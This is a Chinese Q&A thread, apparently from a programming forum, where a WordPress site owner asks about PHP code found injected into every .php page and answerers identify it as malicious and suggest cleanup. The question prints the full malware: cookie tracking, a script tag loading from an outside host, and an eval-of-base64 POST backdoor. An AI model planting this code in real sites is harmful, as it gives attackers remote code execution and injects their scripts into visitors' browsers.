这个php脚本会做什么？是恶意的PHP代码？

Question

有人请告知这个PHP代码会做什么？我有PHP只在每个.php页面上找到这个代码，其他页面像js/css/php.ini他们很好..是这个恶意代码？如果是，请建议如何预防它们？

下面是代码，

global $sessdt_o; 
if(!$sessdt_o) { 
    $sessdt_o = 1; 
    $sessdt_k = "lb11"; 
    if(!@$_COOKIE[$sessdt_k]) { 
     $sessdt_f = "102"; 
     if(!@headers_sent()) { 
      @setcookie($sessdt_k,$sessdt_f); 
     } else { 
      echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; 
     } 
    } else { 
     if($_COOKIE[$sessdt_k]=="102") { 
      $sessdt_f = (rand(1000,9000)+1); 
      if(!@headers_sent()) { 
       @setcookie($sessdt_k,$sessdt_f); 
      } else { 
       echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; 
      } 
      $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; 
      $sessdt_v = urlencode(strrev($sessdt_j)); 
      $sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200); 
      echo "<script src='$sessdt_u'></script>"; 
      echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; 
     } 
    } 
    $sessdt_p = "showimg"; 
    if(isset($_POST[$sessdt_p])){ 
     eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p]))); 
     exit; 
    } 
} 

Answer 1

它更可能将你重定向每一页到攻击者的网站。 @将停止任何错误，因此您不会从此脚本获取任何日志。

如果您希望自己的网站正常工作，则应将其删除。

编辑：它不重定向，但它会在您的网页上注入任何想要的东西。 检查cookie的脚本的第二部分将从他的网站添加一个JavaScript，并可以做恶意的事情。

最后一部分，我不认为任何人都可以猜到它是什么，因为它依赖于一些变量后，这就是$_POST['showimg']，我猜他攻击你的网站与POST。

要做的事：改变你的密码，检查你的文件的写权限，他们不应该是0777，备份数据库和WordPress模板，删除WordPress安装并重新安装从头开始。在你的模板中搜索他的代码，然后添加你清理过的模板。

Answer 2

我还没有仔细研究，但只行

eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p]))); 

显示我已经一点的是，如果不是恶意的，那么非常非常接近 - 有代码注入可能。

Answer 3

你的问题不是代码本身，它是如何到达那里摆在首位。您需要检查文件/文件夹的写入权限，以确保外部没有人可以修改它们。

你提到你正在使用wordpress，请阅读this article关于加强WordPress的安全性。我建议你锁定你的博客（如果可行），直到你解决了你的安全问题。

Answer 4

作为一名安全分析师，我相信它会将您重定向到一个可能的恶意网站，当且仅当您没有该cookie时。如果您已经拥有该cookie，那么该脚本会知道您已经在那里并可能研究恶意软件，从而不执行重定向。该图像可能像一个侦测调试器预设API ..这只是我的看法。